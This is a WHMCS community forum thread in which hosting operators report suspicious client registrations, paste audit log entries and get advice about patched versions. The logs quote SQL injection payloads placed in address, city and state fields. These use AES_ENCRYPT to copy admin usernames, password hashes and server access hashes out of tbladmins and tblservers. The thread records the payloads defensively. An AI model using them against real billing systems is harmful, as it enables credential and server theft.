Jump to content

Spam / hacker registration ??

oldlock

By oldlock
in Using WHMCS

 Share

Recommended Posts

oldlock Junior Member

oldlock

Posted
Posted

I just had a user register, and immediately received a detail change request to the following :

 

First Name: 'snsdjn' to 'hacked'
Last Name: 'sjnsdjn' to 'hacked'
Company Name: 'jsdn' to 'hacked'
Address 1: 'sndjsdn' to 'AES_ENCRYPT(1,1), address1= (SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email SEPARATOR 0x0d) FROM tbladmins)'
Address 2: 'jsdnsd' to 'AES_ENCRYPT(1,1), address2= (SELECT GROUP_CONCAT(password SEPARATOR 0x0d) FROM tbladmins)'
City: 'dnsdj' to 'AES_ENCRYPT(1,1), city= (SELECT GROUP_CONCAT(type,0x3a,ipaddress,0x3a,username,0x0d,accesshash SEPARATOR 0x0d) FROM tblservers)'
State: 'Victoria' to 'AES_ENCRYPT(1,1), state= (SELECT GROUP_CONCAT(id,0x3a,servertype,0x3a,paytype,0x3a,configoption1 SEPARATOR 0x0d) FROM tblproducts)'
Postcode: '38434' to 'hacked'
Country: 'AU' to 'US'
Phone Number: '83434' to '1'
Default Payment Method: '' to ''

 

It all looked very suspect to me so I deleted it at once - should I be concerned about any possible damage ?

0
Link to comment
Share on other sites
Alex - Arvixe Senior Member

Alex - Arvixe

Posted
Posted
I was running 5.3.6, I'm now up to date. Research subsequent to my post here suggests I should be OK as it's an old exploit.

 

You should be fine. This version is patched against the vulnerability (they can try it but it won't work).

 

I received a same registration. My version is 5.1.13

 

You are also fine. This was patched in 5.1.10 but I recommend you upgrade as other security issues have since been addressed.

 

Yours could well be hacked......you need to upgrade ASAP if it is clean

 

He is patched against this specific vulnerability but it is recommended he upgrade.

 

Details about the AES_ENCRYPT issue can be found here: http://blog.whmcs.com/?t=79527

1
Link to comment
Share on other sites
bdnero Member

bdnero

Posted
Posted
You should be fine. This version is patched against the vulnerability (they can try it but it won't work).

 

 

 

You are also fine. This was patched in 5.1.10 but I recommend you upgrade as other security issues have since been addressed.

 

 

 

He is patched against this specific vulnerability but it is recommended he upgrade.

 

Details about the AES_ENCRYPT issue can be found here: http://blog.whmcs.com/?t=79527

 

Thanks for sharing. That's really nice and informative reply.

0
Link to comment
Share on other sites
  • 7 months later...
hostpal Junior Member

hostpal

Posted
Posted

Ok People!...

 

I upgraded yesterday to the latest version available (5.3.12).

 

And here goes the thing, before the upgrade I never got attacked.

 

Here is the log content:

 

19/03/2015 09:10	Created Client asal daftar -****User ID: 44	System	192.185.82.116

19/03/2015 09:10	Email Sent to asal daftar (Bienvenido(a) a Slash Web Host) -****User ID: 44	System	192.185.82.116

19/03/2015 09:10	New Order Placed -****Order ID: 67****-****User ID: 44	System	192.185.82.116

19/03/2015 09:10	Created Invoice -****Invoice ID: 20100098	System	192.185.82.116

19/03/2015 09:10	Email Sent to asal daftar (Factura emitida) -****User ID: 44	System	192.185.82.116

19/03/2015 09:10	Email Sent to asal daftar (Confirmación de pedido) -****User ID: 44	System	192.185.82.116

19/03/2015 09:10	Client Profile Modified - Address 1: 'cyberteam' to 'AES_ENCRYPT(1,1), address1= (SELECT MIN(type) FROM tblservers)', Address 2: 'cyberteam' to 'AES_ENCRYPT(1,1), address2= (SELECT MIN(ipaddress) FROM tblservers)', City: 'cyberteam' to 'AES_ENCRYPT(1,1), city= (SELECT MIN(username) FROM tblservers)', State: 'saint' to 'AES_ENCRYPT(1,1), state= (SELECT MIN(accesshash) FROM tblservers)', Default Payment Method: '' to '' , Tipo de documento: 'Google' to '', Numero de documento: 'Google' to '' -****User ID: 44	Client	192.185.82.116

19/03/2015 09:10	Client Profile Modified - Address 1: 'AES_ENCRYPT(1,1), address1= (SELECT MIN(type) FROM tblservers)' to 'cyberteam', Address 2: 'AES_ENCRYPT(1,1), address2= (SELECT MIN(ipaddress) FROM tblservers)' to 'cyberteam', City: 'AES_ENCRYPT(1,1), city= (SELECT MIN(username) FROM tblservers)' to 'cyberteam', State: 'AES_ENCRYPT(1,1), state= (SELECT MIN(accesshash) FROM tblservers)' to 'saint', Default Payment Method: '' to '' -****User ID: 44	Client	192.185.82.116

19/03/2015 09:10	Client Profile Modified - Default Payment Method: '' to '' -****User ID: 44	Client	192.185.82.116

19/03/2015 09:10	Client Profile Modified - Default Payment Method: '' to '' -****User ID: 44	Client	192.185.82.116

19/03/2015 09:10	Client Profile Modified - Default Payment Method: '' to '' -****User ID: 44	Client	192.185.82.116

 

So far I haven't noticed anything weird on the server behavior, but I don't know if there is something in specific I should be looking for.

 

Any suggestions?

0
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...

Important Information

By using this site, you agree to our Terms of Use & Guidelines and understand your posts will initially be pre-moderated

  I accept